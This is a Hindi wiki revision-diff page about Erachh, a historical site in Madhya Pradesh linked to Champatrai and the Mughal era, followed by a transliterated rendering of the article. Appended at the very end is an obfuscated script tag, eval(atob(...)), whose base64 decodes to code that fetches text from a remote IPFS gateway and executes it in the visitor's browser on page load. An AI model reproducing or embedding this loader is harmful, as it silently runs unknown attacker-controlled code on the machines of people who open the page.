Difference between revisions of "एरछ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:नया पन्ना (को हटा दिया गया हैं।))
 
Line 1: Line 1:
{{पुनरीक्षण}}
 
[[मुग़ल काल]] में इस स्थान पर एक दुर्ग था यहाँ वीर [[छत्रसाल]] के पिता [[चंपतराय]] ने [[औरंगजेब]] के ज़माने में [[मुग़ल]] सेनाओं से युद्ध करते हुए अपने ठहरने के लिए स्थान बनाया था।<ref>देखें [[बुंदेलखण्ड]] का संक्षिप्त इतिहास-गोरेलाल पुरोहित-पृ. 160</ref>
 
  
{{प्रचार}}
+
[[मुग़ल काल]] में इस स्थान पर एक [[दुर्ग]] था यहाँ [[छत्रसाल|वीर छत्रसाल]] के [[पिता]] [[चंपतराय]] ने [[औरंगजेब]] के ज़माने में [[मुग़ल]] सेनाओं से युद्ध करते हुए अपने ठहरने के लिए स्थान बनाया था।<ref>देखें [[बुंदेलखण्ड]] का संक्षिप्त इतिहास- गोरेलाल पुरोहित-पृ. 160</ref>
 +
 
 +
 
 +
 
  
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 +
*ऐतिहासिक स्थानावली | पृष्ठ संख्या= 111| विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
 +
 +
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
Line 11: Line 14:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{मध्य प्रदेश के ऐतिहासिक स्थान}}
 
{{मध्य प्रदेश के ऐतिहासिक स्थान}}
[[Category:मध्य प्रदेश]][[Category:मध्य प्रदेश के ऐतिहासिक स्थान]]
+
[[Category:मध्य प्रदेश]][[Category:मध्य प्रदेश के ऐतिहासिक स्थान]] [[Category:ऐतिहासिक स्थानावली]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 11:36, 18 May 2018

mugal kal mean is sthan par ek durg tha yahaan vir chhatrasal ke pita chanpataray ne aurangajeb ke zamane mean mugal senaoan se yuddh karate hue apane thaharane ke lie sthan banaya tha.[1]



tika tippani aur sandarbh

  • aitihasik sthanavali | prishth sankhya= 111| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar


  1. dekhean buandelakhand ka sankshipt itihas- gorelal purohit-pri. 160

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>